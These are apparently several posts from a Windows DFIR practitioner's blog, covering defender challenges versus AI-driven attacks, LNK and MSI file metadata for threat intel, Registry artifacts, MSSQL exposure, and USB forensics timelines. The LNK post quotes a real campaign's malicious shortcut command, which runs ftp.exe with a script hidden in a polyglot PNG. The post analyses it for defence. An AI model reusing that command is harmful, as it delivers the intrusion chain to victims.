Thursday, December 11, 2025

Perspectives on Cybersecurity

I'm not a fan of many podcasts. I do like a conversational style, and there are some podcasts that I listen to, albeit not on a regular basis, and not for technical content. They're mostly about either "easter eggs" in Marvel or DC movies, or the conspiracies or speculation about an upcoming movie. Yeah, I know what you're thinking...why spoil it? The fact of the matter is that the way things are going with these superhero movies, it's going to be 2 or more years before the movie even comes out, and there's no way I'm going to remember the podcast.

When it comes to technical content, however, my podcast or video preferences are much more stringent. I'm not a big fan of gratuitous small talk and hilarity; for technical content, I take a more focused approach, and would tend to look for show notes, rather than sit through chatter, ads, and shoutz to sponsors.

Igor Tsyganskiy posted on LinkedIn about having listened to a recent Joe Rogan podcast, where Jensen Huang was the guest. I haven't listened to the podcast - Igor didn't provide a link to make the interview easily accessible - but he did provide his own synopsis of the podcast content. Based on his comments, what I wanted to do here in this blog post is share my views on Igor's comments, through my own aperture.

Let me start by sharing my aperture. For those readers who are not familiar with my background, I spent the first 8 yrs following college working in a technical field in the military. I was trained to provide technical communications services to non- and less-technical folks, so it was something of a consulting role. I did more than just that, but that was what I was trained for, and represents most of my experience. Following my military time, I moved to the private sector, and began providing information security consulting services, starting with vulnerability assessments, and in some cases, "war dialing" (I'll leave that for you to Google). Around 2000 or so, I moved into providing DFIR services, and spent the better part of the next quarter century in consulting, responding "on call" to cybersecurity incidents. During that time, I've worked closely with SOCs and MSSPs, I've been a SOC analyst, I've run a SOC, and I currently work for an MDR provider. 

All of this is to say that my perspective is not the same as Igor's, nor Jensen's; rather than perhaps seeing the final output from a high level, I've spent the better part of my civilian career at the boots-on-the-ground level, watching the sausage get made, or making the sausage myself. 

Now, on to Igor's comments:

AI presents unique challenges in the game of attack vs defense.

Does it? I'm not entirely sure, nor am I convinced, that it does. I do think that based on recent events, threat actors using AI to scale attacks, by pointing AI at the Internet and having it return a list of compromised systems or shells, is a challenge, but I do not see how it changes the defender's current status beyond volume, speed, and scale of the attacks.

Threat actors need to find a path from point A (their starting point) to point B (their target). These points are known to the threat actor (TA). Only the path is not known. 

Defenders need to identify A, deduce B, and protect every path from point A to target B. 

The first task is computationally less costly than the second task.

On the surface, I agree with the "computationally less costly" statement with respect to the threat actors, and that just means that the disparity between threat actors and defenders is asymmetric. However, there's something here that neither Jensen nor Igor appears to add to the discussion; the "why". Why is there this asymmetry? 

The simplest answer is that while defenders should have the "home field advantage", they often don't. Most organizations are built on default installations of operating systems and applications, often with no accurate asset inventory (of systems and of applications), and without any attempts at attack surface reduction. It's not that threat actors have some magical intuition or mystical abilities, and are able to discern the network infrastructure from the outside...most times, if you look closely at the data, they do things because no one told them that they couldn't.

This brings something important to mind. About a decade ago, I ran an incident response for a manufacturing company with a global presence, including offices in Germany. As we set about deploying our tooling and scoping the incident, we saw that the threat actor had moved to endpoints in the office in Germany; however, we were not able to get our tooling installed, not because of technical issues, but due to German privacy laws. We could "see" that the threat actor was moving about these systems, establishing persistence, and stealing data, but there was nothing we could do because we could not deploy our toolset. This was clearly an artificiality that the threat actor ignored, because...well...who was going to stop them? Those working on those systems in that office were more concerned that anything found during the course of the incident response was going to be used against them than they were about data theft, or possibly even ransomware. 

Sometimes during an incident response (IR) engagement, we'd find systems that no one recognized or knew about. Sometimes, we'd have a difficult time finding the actual "owner", of either the system or the application it was running. We'd find indications of Terminal Services running on workstations, or clear evidence that critical servers/domain controllers were regularly used by admins to browse the web, answer email (corporate and personal), etc. Threat actors simply take advantage of this lack of compartmentalization by trying to connect to another system, and finding their efforts succeed. 

Jensen makes a good point that defenders historically work together and therefore can most effectively defend. I agree.  

I do not. 

Based on my aperture, I have not seen "defenders historically work together"...not where the rubber meets the road, "at the coalface", as it were. Yes, perhaps from a much higher view...say that of a founder or CEO...looking across the vast landscape, we see gov't (CISA) and civilian agencies "working together" to make information available. 

However, when it comes to "boots on the ground", where I and others are looking over the shoulder of a system admin (or they're standing over mine), the perspective is entirely different.

I've been on IR engagements where local staff were happy to see me, enthusiastic to work with me, and even sought out knowledge transfer. But I've also been on engagements that were the complete opposite, where local admins were not just suspicious of the IR team, but in some cases, actively worked against us.

During one IR, my point of contact asked me to take an advisor role, to direct his staff and engage them, having them do the work, while sharing the "why". At one point, I asked an admin to copy the Event Logs off of a Windows XP system, specifically asking him to NOT export the logs to text format, but to instead use the "copy" command. The admin nodded that he understood, so I handed him a thumb drive, and went about addressing other issues of the response. Later, when I got back to my room, I tried to run my tools against the files that had been copied to the thumb drive, but none of them worked. I opened the thumb drive, saw the three ".evt" files, and saw that they were not zero bytes in size. I then opened one of the .evt files in a hex editor, and could immediately see that the logs had indeed been exported to text, and then renamed to ".evt". I was able to do some work with the files that I had, but I was disappointed that I could not bring my toolset to bear against the files.
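For anyone wanting to check for this sort of thing programmatically, the raw .evt format is easy to distinguish from a text export; the file begins with a 48-byte header whose first DWORD is the header length (0x30), followed by the ASCII signature "LfLe". A minimal sketch (the function name is my own):

```python
# Sanity-check that a file with a .evt extension is actually a raw Windows
# 2000/XP/2003 Event Log file, and not a text export that was renamed.
import struct

def is_raw_evt(data: bytes) -> bool:
    """Return True if the buffer starts with a valid .evt file header."""
    if len(data) < 8:
        return False
    size, sig = struct.unpack("<I4s", data[:8])
    return size == 0x30 and sig == b"LfLe"

# A text export renamed to .evt fails the check immediately
print(is_raw_evt(b"Event Type:\tInformation\r\n"))                    # False
print(is_raw_evt(struct.pack("<I4s", 0x30, b"LfLe") + b"\x00" * 40))  # True
```

Opening the file in a hex editor, as described above, amounts to the same check done by eye.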

While this is just one example, for every IR engagement where I'd show up and be greeted warmly, there were one or two where the local IT staff was ambivalent, at best, or quietly hostile about my presence. But sometimes, it's not about a consultant being there; something I've seen multiple times over the years is that regardless of what's said or how it's said, be it a SOC ticket, or a phone call (or both), there are times...a lot of times...when an organization will shrug off the "security incident" as, "oh, yeah, that's this admin or that contractor doing their work", when it clearly isn't. 

My point is that I'm not entirely sure that from my aperture, the statement "defenders historically work together" is historically accurate.

2. Defenders need orders of magnitude more GPU cycles to defend 

Once again...why is that?

This goes back to the environment they're defending, which many times lacks an accurate "map", and most often has not been subject to an overall vision or policy, and hence, there's no attack surface reduction. Windows 10 and 11 endpoints are running Terminal Services, and applications are installed with no one realizing that a default installation of MSSQL was also installed along with the application, with default, hard-coded credentials (no brute force password guessing required). 

The detection and response eco-system is more expansive and dynamic than most folks seem to realize. While there is "the way things should be" at each point along the eco-system path, reality often belies this assumption.

Defenders require more GPU cycles because when an alert is received, they need to understand the context of that alert, which many times is simply not available. Or, the analyst who receives the alert misinterprets it, and takes the wrong action (i.e., deems it a false positive, etc.), and the effects snowball. There are more than a few points along the eco-system path where the detection or response can go off the rails, leaving the impacted organization in a much worse position than they were before the alert was generated.

Wednesday, December 10, 2025

Releasing Open Source Tools to the Community

Every now and then, I get contacted by someone who tells me that they used the open source tools I've released in either a college course they took, or in a course provided by one of the many training vendors in the industry. I even once responded to an incident for a large energy sector organization, and while I was orienting myself to the incident, I looked over one of their analyst's shoulders and recognized the output of the tool they were using...it was one of mine.

What I've seen pretty consistently throughout my time in the industry is that once tools are known, people begin downloading them, and including them in their distros/toolsets, and some even add them to training courses (colleges, LE, the federal gov't, private sector, etc.). However, they do so without ever truly understanding the nature of the tool, how and why it was designed, or what problem it was intended to solve. Further, they rarely (to my knowledge) contact the author to understand what went into the development of the tool, nor how the tool was intended to be used. For training courses in particular, those providing the materials and instruction do so without fully understanding how the tool author conducts their own investigations, and therefore, how the open source tool fits into their overall investigative process. As a result, the instruction around that tool is often a shadow of how the tool was intended to be used; what you're getting in these training courses is the instructor's perception of how the tool can be used. 

I've blogged a couple of times regarding various distros of tools that include RegRipper; for example, here and here. That second post includes a brief mention of the fact that, to a very limited extent, RegRipper v3.0 was included in Paraben's E3 product back in 2022; that is to say that the full capability of RegRipper wasn't implemented at the time, just a limited subset of plugins.

I recently heard from someone that Blue Cape Security includes RegRipper in their Practical Windows Forensics training course. If you look at the course content that's provided, the use of RegRipper starts in section 5.1 (Windows Registry Analysis), but Registry parsing (not actual analysis) itself continues into sections 5.2 (User Behavior Analysis), and 5.6 (Analyzing Evidence of Program Execution...I know, don't get me started...) and 5.7 (Finding Evidence of Persistence Mechanisms).

It seems that others use RegRipper, as well. PluralSight has an "OS Analysis with RegRipper" course, and Hackviser has a Windows Registry Forensic Analysis course, both including RegRipper.

I know what you're thinking...if I'm going to "complain" about this, why not do something about it? 

Well, I'm not complaining. That's not it, at all. All I'm saying is that if you take a training course that involves the use of open source tools that the vendor/instructor has collected, you're getting their perspective of the use of the tool, and likely not the full benefit of the "why" behind the tool. 

And yes, if I had even a hint that analysts and examiners were interested in really, truly understanding how to go about analyzing the Windows Registry, I'd develop and deliver a course, or series of courses, myself. As it is, my perspective is that folks are pretty happy with what they know.

Saturday, November 29, 2025

Intel in LNK Files

I was reading a pretty interesting write-up from Seqrite regarding, in part, the use of pseudo-polyglot documents. In this case, delivery occurred via a ZIP archive that contains an LNK file and a PNG file. The PNG file is the pseudo-polyglot file in question; the binary contents contain a series of commands to be executed via ftp.exe, followed by what appears to be a PDF document. The attack is initiated when the target user double clicks the LNK file; I'll leave the rest of the description to the author. I will say that I'm not used to the author's writing style, so it took me a bit of effort to get used to it, and to get a better view of what the author was trying to share. 

However, what did interest me more was that the threat actor's efforts included an LNK, something that had to be created on the threat actor's infrastructure before it was included in the archive. As such, from an intel perspective, LNK files are "free money", and something I've talked about here in this blog more than a few times.

Using the hash provided in the write-up, I was able to find a sample to download and parse myself. The LNK file itself had very little actual metadata beyond what was shared in the write-up, but that was still very interesting to me.

Take a look at the full set of metadata:

guid               {00021401-0000-0000-c000-000000000046}
shitemidlist       My Computer/C:\/Windows/system32/cmd.exe

**Shell Items Details (times in UTC)**
  C:0                   M:0                   A:0                  Windows  (9) 
  C:0                   M:0                   A:0                  system32  (9) 
  C:0                   M:0                   A:0                  cmd.exe  (9)  

commandline        /c ftp.exe -s:"offsec-certified-professional.png"
iconfilename       %ProgramFiles(x86)%\\Microsoft\\Edge\\Application\\msedge.exe
hotkey             0x0                             
showcmd            0x1                             

***LinkFlags***
HasLinkTargetIDList|IsUnicode|HasArguments|HasIconLocation

***PropertyStoreDataBlock***
GUID/ID pairs:
{46588ae2-4cbc-4338-bbfc-139326986dce}/4      SID: S-1-5-21-1526495471-1806070692-3097244026-1000

***KnownFolderDataBlock***
GUID  : {1ac14e77-02e7-4e5d-b744-2eb1ae5198b7}
Folder: CSIDL_SYSTEM

We can see that the shell item time stamps are zero'd out, there's no machineID or NetBIOS name listed, no volume serial number, etc. The dearth of metadata can be just as important, or even more so, than when an LNK file contains much more metadata. My most recent blog post on LNK file metadata, prior to this post, illustrates an LNK file that is rife with metadata. 

So, the LNK file used in the Seqrite campaign may be the result of using a specific tool to create the LNK file, or it may be the result of applying a process to the LNK file, after it was created, to "scrub" a lot of the metadata that we might expect to see. Either way, tracking this information can be very valuable for CTI teams, as the available metadata tells us something about the adversary. Also, strings such as the SID shown can be used to search for other, similar samples, in an effort to round out the adversary's intel picture.
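As an aside, pulling the LinkFlags shown above out of a sample doesn't require a full parser; per the MS-SHLLINK format, the header starts with a HeaderSize of 0x4C and a 16-byte class ID, and LinkFlags is the DWORD at offset 0x14. A minimal sketch (flag list limited to the low byte for brevity; function names are my own):

```python
# Decode the LinkFlags DWORD from a shell link (LNK) file header.
import struct

LINK_FLAGS = [
    "HasLinkTargetIDList", "HasLinkInfo", "HasName", "HasRelativePath",
    "HasWorkingDir", "HasArguments", "HasIconLocation", "IsUnicode",
]

def decode_link_flags(header: bytes) -> list[str]:
    """Return the names of the set flags in the low byte of LinkFlags."""
    if struct.unpack("<I", header[:4])[0] != 0x4C:
        raise ValueError("not a shell link header")
    flags = struct.unpack("<I", header[0x14:0x18])[0]
    return [name for i, name in enumerate(LINK_FLAGS) if flags & (1 << i)]

# A header with flags 0xE1, matching the sample metadata above
hdr = struct.pack("<I", 0x4C) + b"\x00" * 16 + struct.pack("<I", 0xE1)
print(decode_link_flags(hdr))
```

Run against the Seqrite sample, this yields the same four flags listed in the metadata dump above.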

Wednesday, November 26, 2025

Registry: FeatureUsage

Maurice posted on LinkedIn recently about one of the FeatureUsage Registry key subkeys; specifically, the AppSwitched subkey. Being somewhat, maybe even only slightly aware of the Windows Registry, I read the post with casual, even mild interest. 

Someone posted recently that cybersecurity runs on caffeine and sarcasm...I've got my cup of coffee right in front of me, and I've placed the sarcasm in front of us all.  ;-)

The RegRipper featureusage plugin was originally written in 2019, and includes a reference to a Crowdstrike blog post written in 2020, authored by Jai Minton (who is now with Huntress). The figure to the right was captured from the blog post, and provides a succinct description of how the AppSwitched key is populated. Specifically, Jai stated, "This key provides the number of times an application switched focus (was left-clicked on the taskbar)." This helps us understand a bit more about process execution, as for the application to exist on the taskbar and to have its focus switched, that application has to have been executed.

After finding and reading the blog post, I wrote a brief blog post here on this blog that mentioned the Registry key, and referenced Jai's blog post.

To Maurice's point, this is, in fact, a valuable artifact, so kudos to Maurice for pointing it out and mentioning it again. If you read through the comments to Maurice's post, there are some hints there as to how to use the value data in your analysis. As you'll note, neither the value names nor the data itself includes a timestamp, but the AppSwitched subkey does have a LastWrite time, and this can be included in a timeline. The value names can be used as pivot points into a timeline, adding something of a "third dimension" to timeline analysis. You can use this alongside timestamped information, such as Prefetch entries, Registry data, SRUM DB data, etc.
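As a sketch of what folding this artifact into a timeline might look like in practice; the function and field names are my own, and the value data is made up. Each value name gets recorded against the key's LastWrite time, so the names can serve as pivot points alongside timestamped sources:

```python
# Fold FeatureUsage\AppSwitched value names into timeline entries, keyed
# to the subkey's LastWrite time (the values carry no timestamps of their own).
from datetime import datetime, timezone

def appswitched_to_timeline(last_write, values):
    """Emit one (timestamp, source, description) tuple per AppSwitched value."""
    return [(last_write, "REG", f"AppSwitched: {name} (count: {count})")
            for name, count in sorted(values.items())]

key_last_write = datetime(2025, 11, 20, 14, 3, 22, tzinfo=timezone.utc)
values = {"C:\\Windows\\System32\\mstsc.exe": 12, "msedge.exe": 87}

for ts, src, desc in appswitched_to_timeline(key_last_write, values):
    print(ts.isoformat(), src, desc)
```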

Unprecedented Complexity

I saw it again, just today. Another post on social media stating that IT teams/defenders "face unprecedented complexity". 

This one stood out amongst all of the posts proclaiming the need for agentic AI on the defender's side, due to how these agents were currently being employed on the attacker side. We hear things like "autonomous agents" being able to bring speed and scale to attacks. 

I will say that in my experience, defenders are always going to face complexity, but by its very nature, I would be very hesitant to call it "unprecedented". The reason for this is that cybersecurity is usually a bolted-on afterthought, one where the infrastructure already exists, with a management culture that is completely against any sort of consolidated effort at overall "control". 

Most often, there's no single guiding policy or vision statement, specifically regarding cybersecurity. Many organizations and/or departments may not even fully understand their assets; what endpoints, both physical and virtual, are within their purview? How about applications running on those endpoints? And which of those assets are exposed to the public Internet, or even to access within the infrastructure itself, that don't need to be, or shouldn't be?

For example, some applications, such as backup or accounting solutions, will install MSSQL "under the hood". Is your IT team aware of this, and if so, have they taken steps to secure this installation? From experience, most don't...the answer to both questions is a resounding "IDK". 

Default installations of MSSQL will send login failure attempts to the Application Event Log, but not successful logins. That only really matters if you're monitoring your logs in some way; many aren't, and even with SIEM solutions, these events are sometimes not included in monitoring. I've seen endpoints with upwards of 45K (yes, you read that right...) failed login attempts to MSSQL recorded in the Application Event Log, but this is most often on systems where the application doesn't rely on the MSSQL installation having hard-coded account credentials. 
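To illustrate, MSSQL records failed logins in the Application Event Log as event ID 18456 from the MSSQLSERVER source ("Login failed for user..."), and tallying those by account name is a quick way to surface brute forcing like the 45K-failure example. A minimal sketch, with stand-in records in place of actual parsed EVTX output:

```python
# Tally MSSQL failed-login events (event ID 18456, source MSSQLSERVER)
# by the account name carried in the event strings.
from collections import Counter

# Stand-ins for records produced by an Application Event Log parser
records = [
    {"source": "MSSQLSERVER", "event_id": 18456, "strings": ["sa"]},
    {"source": "MSSQLSERVER", "event_id": 18456, "strings": ["sa"]},
    {"source": "MSSQLSERVER", "event_id": 18456, "strings": ["admin"]},
    {"source": "ESENT", "event_id": 326, "strings": []},
]

failed = Counter(r["strings"][0] for r in records
                 if r["source"] == "MSSQLSERVER" and r["event_id"] == 18456)
print(failed.most_common())   # [('sa', 2), ('admin', 1)]
```

On a real system, an account like "sa" showing tens of thousands of failures is a clear pivot point for a timeline.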

The point is that basic IT hygiene starts with an accurate asset inventory, and is followed with attack surface reduction. Once you know what systems you have, and what applications should/need to be running on those systems, you can begin to address such things as logging configurations, monitoring (SIEM, EDR, etc.), etc. Attack surface reduction increases the efficacy of your controls, and minimizes noise from false positives. Not only does this ensure that you're alerted when a security incident does occur, but it also provides for context, *and* it furthers your ability to quickly determine the nature, scope, and origin of the incident. I've seen organizations that are using a SIEM, but the Security Event Logs on many of their Windows endpoints are not logging either successful logins or failed login attempts. 

This is going to be something of a hot take for many readers, but right now, AI (and specifically agentic AI) is a distraction for defenders. Yes, based on what we're seeing through social media, agentic AI may be furthering threat actors by facilitating faster attacks, at scale, but when it comes right down to it, it's all about the speed and volume; exposure of vulnerable systems remains the same. It's the finding and exploiting the vulnerable systems that's gotten faster.

The fact is that for the attacks to be successful, even with speed and scale, vulnerable systems need to be exposed to the Internet, and as such, accessed via some means. Yes, even endpoints not directly exposed to the Internet can be compromised via attacks such as phishing, SEO poisoning, or some other means that tricks the user into installing something that reaches out, but even some of these attacks can be inhibited or even obviated by some simple, free modifications to the endpoint itself. 

Thoughts on Analysis

Warning - before you get started reading this blog post, it's only fair that I warn you...in this post, I make the recommendation that you document your analysis process. If you find this traumatic, you might want to just move on. ;-)

Robert Jan Mora, a name that I've known for some time within the DFIR community, recently posted something pretty fascinating on LinkedIn, having to do with a case that he worked a while ago. His post, in turn, leads to this article from The Wire, from India, which includes an interview with him. 

The "so what" of the article itself has to do with an initial report that states that no malware was present, and two subsequent reports, one of which is from Robert Jan's analysis, stating that malware was found on a USB device.

In his LinkedIn post, Robert Jan emphasizes the need for malware scans in a law enforcement environment. Back when I first started working cases, even internally, in the early 2000s, I recommended the same thing, albeit using AV scanners that were not installed on the imaged endpoint. Even more tools are available these days; for example, consider Yara, or something more along the lines of the Thor Scanner from Nextron Systems.
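Even without an AV engine or Yara, the most basic version of scanning a mounted image is a hash sweep against a known-bad list. A minimal sketch, purely illustrative and no substitute for a real scanner:

```python
# Hash every file under a mounted image root and report matches against a
# set of known-bad SHA-256 digests.
import hashlib
import tempfile
from pathlib import Path

def sweep(root: Path, known_bad: set) -> list:
    """Return (path, digest) pairs for files whose hash is in known_bad."""
    hits = []
    for p in sorted(root.rglob("*")):
        if p.is_file():
            digest = hashlib.sha256(p.read_bytes()).hexdigest()
            if digest in known_bad:
                hits.append((str(p), digest))
    return hits

# Demo against a throwaway directory standing in for a mounted image
with tempfile.TemporaryDirectory() as d:
    sample = Path(d) / "dropper.exe"
    sample.write_bytes(b"not really malware")
    bad = {hashlib.sha256(b"not really malware").hexdigest()}
    print(sweep(Path(d), bad))
```

Hash matching only catches exact copies, of course, which is exactly why signature- and behavior-based scanning still matter.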

To learn a bit more about this man, check out this Forensic Focus interview.

Okay, but so what? Why does this matter, or why is it important?

When looking to see if malware exists, or did exist on an endpoint, there are different approaches you can take, perhaps using AV scanners, or something like Yara. Or, sometimes, we may not find the actual malware itself, maybe not right away, but we will see clear indications of its presence, or that it had executed. For example, if you've created a timeline of system activity, you may find a cluster of activity with different components derived from different sources, such as the Registry, Windows Event Log, file system, etc. Separately, these may not be entirely conclusive, but when viewed together, and within a narrow timeframe, they may provide clear indications of something having happened, much like finding footprints, disturbed earth, broken branches, and matted grass following the passage of an animal through a wilderness area.
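That clustering of activity can even be roughed out programmatically, once events from the various sources are normalized into (timestamp, source, description) tuples. A sketch, with made-up events and a hypothetical five-minute window:

```python
# Group normalized timeline events into clusters of activity that fall
# within a narrow time window of each other.
from datetime import datetime, timedelta

def cluster(events, window=timedelta(minutes=5)):
    """Group sorted (timestamp, source, description) tuples into clusters."""
    events = sorted(events)
    clusters, current = [], [events[0]]
    for ev in events[1:]:
        if ev[0] - current[-1][0] <= window:
            current.append(ev)
        else:
            clusters.append(current)
            current = [ev]
    clusters.append(current)
    return clusters

events = [
    (datetime(2025, 11, 1, 10, 0), "REG",  "Run key value added"),
    (datetime(2025, 11, 1, 10, 2), "FILE", "dropper.exe created"),
    (datetime(2025, 11, 1, 10, 3), "EVTX", "7045: service installed"),
    (datetime(2025, 11, 1, 16, 30), "FILE", "unrelated software update"),
]
for grp in cluster(events):
    print(len(grp), "event(s) starting", grp[0][0].isoformat())
```

The three-event cluster is the "footprints and broken branches" pattern; the lone event six hours later stands apart.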

You can even find indications of malware having been present, or even executed, on a system, while the executable itself no longer exists on the endpoint at the time of the investigation. Using sources such as the SRUM DB and/or AmCache.hve and PCA log files may provide valuable insights, even if the malware has been removed from the endpoint.

When I was working PCI forensic investigations, our team had found that some of the malware used by the threat actors was based on a "compiled" Perl script, used to retrieve credit card numbers from a process memory dump. When run, the program extracted the Perl runtime from the EXE, and placed it in a particular folder path, and each time it was run, the path was slightly different; the final folder name changed. However, using file system metadata, we were able to determine a very explicit timeline of the compromise.

Or, we may find indications that an attempt was made to execute the malware, but it failed, either because it was detected and quarantined, or because something caused it to crash. PCA log files and application pop-up/WER messages in the Application Event Log have proved to be very illuminating on some of the cases with which I've engaged.

The key to all of this is to document your analysis process; if you don't know what you did, you can't make modifications or adjustments to the process. For example, if you have a memory dump, how did you go about searching for indications of a specific IP address? Volatility? Bulk_extractor? Don't remember/don't know? If you mounted the image and scanned it with AV, which one/version did you use? Knowing what you did, and what you found, means that you can then make adjustments and improvements to the process over time.
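Documentation doesn't have to be elaborate; even an append-only log of what was done, with which tool and version, and what was found, is enough to revisit and refine the process later. A minimal sketch, with field names of my own choosing:

```python
# The simplest possible form of documenting an analysis step: an append-only
# case log recording the action, the tool and version used, and the finding.
import json
from datetime import datetime, timezone

def log_step(log, action, tool, version, finding):
    """Append one analysis step to the case log."""
    log.append({
        "when": datetime.now(timezone.utc).isoformat(),
        "action": action,
        "tool": tool,
        "version": version,
        "finding": finding,
    })

case_log = []
log_step(case_log, "searched memory dump for suspect IP address",
         "bulk_extractor", "2.0.0", "3 hits, all in browser cache")
print(json.dumps(case_log[0], indent=2))
```

A log like this answers "which scanner/version did you use?" months later, and makes the process something you can actually adjust.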

Thursday, November 13, 2025

Images

In writing Investigating Windows Systems, published in 2018, I made use of publicly available images found on the Internet. Some were images posted as examples of techniques, others were posted by professors running courses, and some were from CTFs. If you have read the book, you'll know that for each of the images, I either used or made a more "real world" scenario, something that aligned much more closely to my experiences over two and a half decades of DF/IR work, a good bit of which was consulting. During that time, and at several different companies, we'd have an "IR hotline" folks could call, and request computer incident response...this is something many firms continue to do. Those firms also very often had "intake forms", documents an analyst would fill out with pertinent information from a caller or customer, which very often included investigative goals. 

Over the years, the sites from which I downloaded some of the images I used have disappeared, which is unfortunate, but not a deal killer. The intent and value of the book isn't about the images, but rather, about the process. The processes used, even those where an image of a Windows XP system was used, can be replicated, developed, and extended for any Windows OS. 

Brett Shavers recently posted on LinkedIn, pointing to the repository of available images he's compiled at DFIR.Training.

Over at Stark4N6, we see another repository of images, this one called The Evidence Locker. Here's Kevin's LinkedIn post with a description of the site.

If you're not interested in downloading full or partial images, I recently took a look at an infostealer sample, from the perspective of file formats. Fortunately, the OP provided a hash for the sample they looked at, which allowed me to find a site from which I could download a copy of the sample. I'm not a malware RE guy, but what I do try to do is follow Jesse Kornblum's example of using all the parts of the buffalo, and exploit file format metadata for threat intel purposes.

Wednesday, November 12, 2025

File Formats

I'm a huge fan of MS file formats, mostly because they provide for the possibility of an immense (and often untapped, unexploited) amount of metadata. Anyone who's followed me for any length of time, or has read my blog, knows that I'm a huge fan of file formats such as Registry hives (and non-Registry files with the same structure), as well as LNK files.

Historically, lots of different MS file formats have contained significant, and often damning, metadata. Anyone remember the issue of MSWord metadata that the Blair government encountered over two decades ago? I shared some information related to coding, using the file as an exemplar, in the WindowsIR blog.

I ran across a LinkedIn post from Maurice Fielenbach, where he talked about an infostealer bundled in an MSI file. Interestingly enough, MSI files are structured storage files, following the OLE format, albeit with different streams, the same as MSWord docs and JumpList files.

I'm not a malware RE guy, so I don't have a specialized tool set for parsing these kinds of files. I generally start with the MiTeC Structured Storage Viewer, something I've used before. In the image to the left, you can see the SummaryInformation block parsed and visible in MSSV. 

If you read through the comments, MalCat is recommended as a tool to use to click through the structure of this file format, and others. This looks like a great possibility, and to be honest, if you're into malware analysis, the MalCat blog looks really informative, as well. If you're interested in a sample to work with yourself, I found one at MalwareBazaar.

In his LinkedIn post, Maurice said, "I highly recommend taking a deeper look at the MSI file format itself and familiarizing yourself with common installer frameworks such as WiX." I'd agree, particularly given that the test.msi image shows that the creating application was the "WiX Toolset".

Regardless of the tools you use, and the area of cybersecurity that you're in or focused on, information like this can expand your knowledge base as to what's possible, or by providing new directions for study or skill expansion. This is not only valuable as a malware or DF analyst, but also for threat intel analysts, as this information can add context and granularity to the intel you're developing.

Monday, November 10, 2025

What We Value

Over the past couple of days, I've had images pop up in my feed showing people's workstations, most often with multiple screens. I've seen various configurations, some with three or more screens, but the other thing I've noted is that for those social media profiles, there's little else that's shared. 

Yep, they have a nifty configuration, one that they want to show off, but there's little to no attempt to show off their skills and abilities, or what they've actually done with that configuration.

Within cybersecurity, we see a lot of that, as well, with certifications, commercial product licenses, and even open-source distributions - you know, those DVDs or VMs where someone else pulls together a list of free and open-source tools, and puts a fancy background and/or menu system on it. A lot of these distros derive their "value" from how new they are, or how many tools are included...but rarely do we see, "...yeah, and this is how I used this distro to solve a case...", or anything close to that.

We often collect these things, like badges or challenge coins, but is someone really a better analyst if they have 4 instead of 3 screens? I honestly don't know...never having been able to afford multiple screens myself, I've spent the past 28 yrs operating off of a single laptop screen. And yes, I have used some of those open-source tools, but I'm not a huge fan of distributions. 

All of this means that I tend to value something completely different from what the more vocal folks within the industry tend to value. I look to folks trying to develop and share processes and experiences that have the potential to change the direction of the industry.

Monday, November 03, 2025

Analysis Playbooks: USB

In 2005, Cory Altheide and I published the first peer-reviewed paper to address tracking USB devices on Windows systems. Over the years, it's been pretty amazing to see not only the artifacts expand and evolve, but also to see folks pick up the baton and carry on with describing what amounts to a "playbook" for developing this information as part of an investigation. Not only has malware such as Raspberry Robin propagated via USB devices, but with the rise of other devices that can be attached via a USB connection while using different protocols, it has become more important to operationalize this analysis in a playbook. 

After all, why not take the inefficient, error-prone, purely manual aspects out of the parsing by automating it?

Morad R. put together a series of posts that outline different data/artifact sources you can examine to identify USB devices that had been connected to the endpoint, as well as attribute the use of the devices to a particular user. This series of posts illustrates some steps that begin the process of pulling back the veil, if you will, on the use of USB devices on Windows systems. While there is definitely more to be done and shared, the important common factor across the posts is the use of timelines. 

USB Forensics, pt 1: Unmasking the connected device - Focuses on the System Registry hive, and extracting time stamps from Properties key values. The focus on a timeline is a great way to get started on this, as doing so takes the analyst directly to context. 

However, by focusing on just the USB and USBStor keys in the System hive, other devices (smartphones, digital cameras) are missed. That's not really an issue, per se, as the same playbook can be applied to the appropriate Registry keys.
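To illustrate the "same playbook, applied to the appropriate keys" idea, here's a minimal sketch. The key paths below are commonly cited locations for USB and USB-attached device artifacts, and the parse_key callable is a stand-in for whatever hive parser you actually use (RegRipper, python-registry, etc.); nothing here is specific to any one tool.

```python
# Playbook-as-data: one parsing routine, applied across the relevant keys.
PLAYBOOK = [
    ("SYSTEM",   "CurrentControlSet\\Enum\\USBStor"),              # mass storage
    ("SYSTEM",   "CurrentControlSet\\Enum\\USB"),                  # all USB devices
    ("SYSTEM",   "MountedDevices"),                                # volume mappings
    ("SOFTWARE", "Microsoft\\Windows Portable Devices\\Devices"),  # phones, cameras
]

def run_playbook(parse_key):
    """Apply one parsing routine to every key in the playbook.

    parse_key: callable(hive, key_path) -> list of findings.
    """
    findings = []
    for hive, key_path in PLAYBOOK:
        findings.extend(parse_key(hive, key_path))
    return findings
```

Adding coverage for a new device class then becomes a one-line change to the playbook, rather than a change to the analysis process.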

USB Forensics, pt 2: Mapping device to user & drive letter - focuses on the user's NTUSER.DAT, but doesn't mention other artifacts, such as shellbags, RecentDocs, UserAssist, etc., that could be used to correlate additional user activity with the device, particularly via a timeline. 

RegRipper still makes use of "profiles", which is the term I used to describe what became known as "playbooks". Or, another way to look at it is that you can implement playbooks through these profiles.

USB Forensics, pt 3: The Event Log timeline - the focus on a timeline continues, which is good. However, the logs are technically referred to as "Windows Event Logs"; "Event Logs" refers to the Windows 2000, XP, and 2003 era logs. I understand, I 'get it', that this is a distinction without a difference for most analysts, particularly those who've never had to work with Event Log records from older systems, and are only familiar with the newer format implemented as of Windows Vista. 

All three of these posts, together, serve as a good foundation, and a great first step toward addressing USB-connected devices on Windows endpoints. Just as the field has grown and expanded since 2005, it will continue to do so in the future. In addition to providing the data sources, the underlying reliance on (or at least pointing in the direction of) timelines is, I believe, foundational. Start with a timeline; do not let a timeline be something you assemble manually, after everything else is done. We can always add or remove data sources, create new RegRipper or Events Ripper plugins, etc., but creating a timeline should be "first principles". 
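To illustrate what I mean by making the timeline "first principles", here's a minimal sketch of the 5-field TLN format (time|source|system|user|description) that the RegRipper TLN plugins emit; the sample events below are hypothetical.

```python
from datetime import datetime, timezone

def tln(dt, source, system, user, description):
    """Format one event as a pipe-delimited TLN line; time is a Unix epoch."""
    return "|".join([str(int(dt.timestamp())), source, system, user, description])

# Hypothetical events from different data sources, normalized into one format
events = [
    tln(datetime(2025, 1, 3, 15, 2, 21, tzinfo=timezone.utc),
        "REG", "WORKSTATION01", "", "USB device key first written"),
    tln(datetime(2025, 1, 3, 15, 2, 25, tzinfo=timezone.utc),
        "EVTX", "WORKSTATION01", "", "device connection event record"),
]

# Sort numerically on the epoch field to assemble the timeline events file
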